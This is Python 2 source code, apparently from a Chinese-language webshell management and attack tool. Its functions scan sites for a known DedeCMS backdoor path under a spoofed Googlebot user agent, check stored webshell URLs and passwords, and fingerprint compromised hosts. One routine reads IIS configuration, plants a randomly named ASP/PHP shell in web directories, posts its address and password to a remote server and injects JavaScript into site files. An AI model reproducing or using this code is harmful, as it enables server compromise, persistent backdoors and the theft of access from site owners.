def find(self, arg): site = '/plus/dst.php' heareds = { "User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" } conn = httplib.HTTPConnection(arg) try: conn.request('GET', site, None, heareds) httpres = conn.getresponse() if httpres.status == 200: data = 'http://%s/plus/dst.php' % arg if yijuhua.yijuhua_cs("php", data, "cmd"): #ASP还是PHP ,URL地址 ,密码 #是 EXP_list = [ self.url, "exp", "exp_dedecms_yijuhua", data, "cmd", "webshell" ] ##["网址","漏洞类型","漏洞详细信息","漏洞地址","密码","备注"] #print EXP_list Class_Queue.exp_url.put(EXP_list, 0.5) #插入队列 except Exception, e: #print e return False
def yjh_cs_2(self): #测试一句话是否连接成功 global yu_2, yu_3 self.ui.main_pushButton_2.setEnabled(0) #给改成禁用 int_model = self.ui.SQLite_tableView.selectionModel() #获取选中编号 model = self.ui.SQLite_tableView.model( ) #index = model.index(3,1)#data = model.data(index)#print data.toString() h = qqwry.C_hoset() for index in int_model.selectedRows(): #// 对于被选中的每一行 try: int_index = index.row() #获取行号 s0 = model.data(model.index(int_index, 0)).toString() s1 = model.data(model.index(int_index, 1)).toString() data_time2 = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) data_time = time.mktime( time.strptime(data_time2, '%Y-%m-%d %H:%M:%S')) #转化成时间戳 if s0 == "" or len(s0) <= 7: yu_3 += 1 #失败多少条 self.tableView_add(int_index, None, None, u"null", None, None, None, None, None, None, data_time2) #添加数据 sql_data = "update shell set zts3='null',time2s7='%s' where urls1='%s' and passwods2='%s'" % ( data_time, str(s0), str(s1)) self.sql3.mysqlite3_update(sql_data) continue #跳过 # url="http://www.sttc.cn/uploadfile/2013/0621/thumb_6_6_.Php.JPG%20%20%20%20%20%20%20Php" # PASS="******" if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)): yu_2 += 1 #成功多少条 #self.tableView_add(int_index,None,None,u"ok",None,None,None,data_time) #添加数据 #sql_data="update shell set zts3='ok',time2s7='%s' where urls1='%s' and passwods2='%s'"%(data_time,str(s0),str(s1)) #yijuhua_win_linux(url,PASS): #URL地址 ,密码 返回操作系统 win_linux = yijuhua.yijuhua_win_linux( str(s0), str(s1)) #URL地址 ,密码 返回操作系统 WLWZ = h.www_data(qqwry.url_www(str(s0))) WLWZ = u"%s" % (WLWZ) if g.bool_asp_php(str(s0)) == "asp": win_linux = "WinNT" self.tableView_add(int_index, None, None, u"ok", str(win_linux), None, None, None, WLWZ, None, data_time2) #添加数据 sql_data = "update shell set zts3='ok',oss4='%s',ips5='%s',time2s7='%s' where urls1='%s' and passwods2='%s'" % ( str(win_linux), WLWZ, data_time, str(s0), str(s1)) else: yu_3 += 1 #失败多少条 self.tableView_add(int_index, None, None, u"No", u"No", None, None, None, None, None, data_time2) #添加数据 sql_data = "update shell set zts3='No',oss4='No',time2s7='%s' where urls1='%s' and passwods2='%s'" % ( data_time, str(s0), str(s1)) self.sql3.mysqlite3_update(sql_data) except BaseException, e: print(str(e)) self.ui.main_pushButton_2.setEnabled(1) return 0
def db_cs(self, ID): #测试还没有测试过的一句话 try: global yu_1, yu_2, yu_3 sql_data = "" if ID == 0: sql_data = "select * from shell where zts3 is null" if ID == 1: sql_data = "select * from shell where zts3='ok'" if ID == 2: sql_data = "select * from shell where zts3='No'" self.sql3.conn.commit() # 获取到游标对象 cur = self.sql3.conn.cursor() # 用游标来查询就可以获取到结果 cur.execute(sql_data) # 获取所有结果 res = cur.fetchall() #从结果中取出所有记录 for line in res: s0 = str(line[0]) s1 = str(line[1]) data_time2 = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) data_time = time.mktime( time.strptime(data_time2, '%Y-%m-%d %H:%M:%S')) #转化成时间戳 if s0 == "" or len(s0) <= 7: yu_3 += 1 #失败多少条 sql_data = "update shell set zts3='null',time2s7='%s' where urls1='%s' and passwods2='%s'" % ( data_time, str(s0), str(s1)) self.sql3.mysqlite3_update(sql_data) continue #跳过 if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)): yu_2 += 1 #成功多少条 win_linux = yijuhua.yijuhua_win_linux( str(s0), str(s1)) #URL地址 ,密码 返回操作系统 WLWZ = self.h.www_data(qqwry.url_www(str(s0))) WLWZ = u"%s" % (WLWZ) if g.bool_asp_php(str(s0)) == "asp": win_linux = "WinNT" sql_data = "update shell set zts3='ok',oss4='%s',ips5='%s',time2s7='%s' where urls1='%s' and passwods2='%s'" % ( str(win_linux), WLWZ, data_time, str(s0), str(s1)) self.br_pr_sogo(s0, s1) #获取 百度 谷歌 搜狗 权重 print u"URL:%s--passwod:%s-----ok-----%s" % (str(s0), str(s1), WLWZ) self.messagebox() else: yu_3 += 1 #失败多少条 sql_data = "update shell set zts3='No',oss4='No',time2s7='%s' where urls1='%s' and passwods2='%s'" % ( data_time, str(s0), str(s1)) self.messagebox() print u"URL:%s--passwod:%s-----No" % (str(s0), str(s1)) self.sql3.mysqlite3_update(sql_data) except BaseException, e: print(str(e)) return 0
def scan(self, url): self.look_add_file() #添加数据 for i in self.list: # ss = i.split("|") if len(ss) >= 2: url2 = url + ss[0] if yijuhua.yijuhua_cs(self.bool_asp_php(url2), url2, str(ss[1])): #ASP还是PHP ,URL地址 ,密码 #是 EXP_list = [ self.url, "exp", "exp_eval", url2, str(ss[1]), "webshell" ] ##["网址","漏洞类型","漏洞详细信息","漏洞地址","密码","备注"] #print EXP_list Class_Queue.exp_url.put(EXP_list, 0.5) #插入队列
def br_pr_sogo_4(self): #查询\WEBSHELL 状态 self.ui.pb_pushButton_1.setEnabled(0) #给改成禁用 int_model = self.ui.tableView.selectionModel() #获取选中编号 model = self.ui.tableView.model( ) #index = model.index(3,1)#data = model.data(index)#print data.toString() for index in int_model.selectedRows(): #// 对于被选中的每一行 try: int_index = index.row() #获取行号 s0 = model.data(model.index(int_index, 0)).toString() s1 = model.data(model.index(int_index, 1)).toString() if s0 == "" or len(s0) <= 7: self.tableView_add(int_index, None, None, u"null") #添加数据urllib.quote(str(s0)) sql_data = "update url set zt='null' where url='%s' and passwod='%s'" % ( str(s0), str(s1)) self.sql3.mysqlite3_update(sql_data) continue #跳过 #print str(s0) if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)): win_linux = "WinNT" if g.bool_asp_php(s0) == "php": win_linux = yijuhua.yijuhua_win_linux(str(s0), str(s1)) www_wlwz = yijuhua.www_wlwz(str(s0)) self.tableView_add(int_index, None, None, u"ok", str(win_linux), None, None, www_wlwz) #添加数据urllib.quote(str(s0)) sql_data = "update url set zt='ok',win='%s',wl='%s' where url='%s' and passwod='%s'" % ( str(win_linux), urllib.quote( str(www_wlwz)), str(s0), str(s1)) else: self.tableView_add(int_index, None, None, u"No") #添加数据urllib.quote(str(s0)) sql_data = "update url set zt='No' where url='%s' and passwod='%s'" % ( str(s0), str(s1)) #print sql_data self.sql3.mysqlite3_update(sql_data) except BaseException, e: pass
def br_pr_sogo_4(self): #查询\WEBSHELL 状态 self.ui.pushButton_4.setEnabled(0) #给改成禁用 int_model = self.ui.tableView.selectionModel() #获取选中编号 model = self.ui.tableView.model( ) #index = model.index(3,1)#data = model.data(index)#print data.toString() for index in int_model.selectedRows(): #// 对于被选中的每一行 try: int_index = index.row() #获取行号 s0 = model.data(model.index(int_index, 0)).toString() s1 = model.data(model.index(int_index, 1)).toString() if s0 == "" or len(s0) <= 7: self.tableView_add(int_index, None, None, u"null") #添加数据urllib.quote(str(s0)) sql_data = "update url set zt='null' where url='%s' and passwod='%s'" % ( str(s0), str(s1)) self.sql3.mysqlite3_update(sql_data) continue #跳过 #print str(s0) if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)): #self.tableView_add(int_index,None,None,u"ok",None,None,None,data_time) #添加数据 #sql_data="update shell set zts3='ok',time2s7='%s' where urls1='%s' and passwods2='%s'"%(data_time,str(s0),str(s1)) #yijuhua_win_linux(url,PASS): #URL地址 ,密码 返回操作系统 self.tableView_add(int_index, None, None, u"ok") #添加数据urllib.quote(str(s0)) sql_data = "update url set zt='ok' where url='%s' and passwod='%s'" % ( str(s0), str(s1)) else: self.tableView_add(int_index, None, None, u"No") #添加数据urllib.quote(str(s0)) sql_data = "update url set zt='No' where url='%s' and passwod='%s'" % ( str(s0), str(s1)) #print sql_data self.sql3.mysqlite3_update(sql_data) except BaseException, e: pass
def IIS_xml(): data = open_file() if data == 0: print u"Cannot find the file path in the C IIsWebServerfile" #无法找到IIS配置文件 return 0 p1 = re.compile(r'<IIsWebVirtualDir(.+?)</IIsWebServer>') data1 = data.replace("\n", '') #去除换行符好匹配 IISWEB = p1.findall(data1) #网站路径 for every1 in IISWEB: #网站路径 try: p2 = re.compile(r'ServerBindings="(.+?)"') data2 = p2.findall(every1) #网站域名 if len(data2) < 1: continue #跳过 这一次 p3 = re.compile(r'Path="(.+?)"') data3 = p3.findall(every1) #网站路径 if len(data3) < 1: continue #跳过 这一次 download_Path = TQ_Path(data3[0]) #网站路径 data_list = list_file(download_Path) #遍历文件 if len(data_list) >= 1: data_url2 = "%s%s.%s" % ( data_list[sjs_random(0, len(data_list))], sj_az_AZ(8), ASP_PHP) #传马目录 D:\wamp\www\CPM\Index\Lib\Action\ else: continue #跳过 这一次 www_bool = False #True for www_url in http_www_url(data2[0]): print "www:%s" % (www_url) #网址 http://localhost/ print "download_Path:%s" % (download_Path) #主目录 D:\wamp\www print "download_Path eval:%s" % ( data_url2 ) #文件路径 D:\wamp\www\mythink\.svn\pristine\4b\vuZelUL.php www_url2 = "%s%s" % ( www_url, download_bz(download_Path, data_url2).replace( "\\", '/') ) #编辑路径 http://localhost/mythink/.svn/pristine/4b/vuZelUL.php print "www_Path:%s" % (www_url2) #网址 http://localhost/ path_file(data_url2, argv1) #写入文件 路径 文件 if yijuhua.yijuhua_cs(ASP_PHP, str(www_url2), str(argv2)): www_bool = True data = "%s|%s" % (str(www_url2), str(argv2)) TXT_file2("webshell--OK.txt", data) print "file:%s" % (data_url2) print "url:%s password:%s--OK" % (str(www_url2), str(argv2)) if not argv3 == "": data_url = "%s?url=%s&passwod=%s" % ( str(argv3), str(www_url2), str(argv2)) yijuhua.Aurl_post(data_url) #远程提交到后台 print "post %s" % (data_url) else: data = "%s|%s" % (str(www_url2), str(argv2)) TXT_file2("webshell--NO.txt", data) print "file:%s" % (data_url2) print "url:%s password:%s--NO" % (str(www_url2), str(argv2)) print "----------------------------------------" list_file_js(download_Path) #遍历路径 挂载JS if www_bool == False: if os.path.isfile(data_url2): #查看文件是否存在 os.remove(data_url2) #删除文件 print "delete %s" % (data_url2) except BaseException, e: #print(str(e)) return 0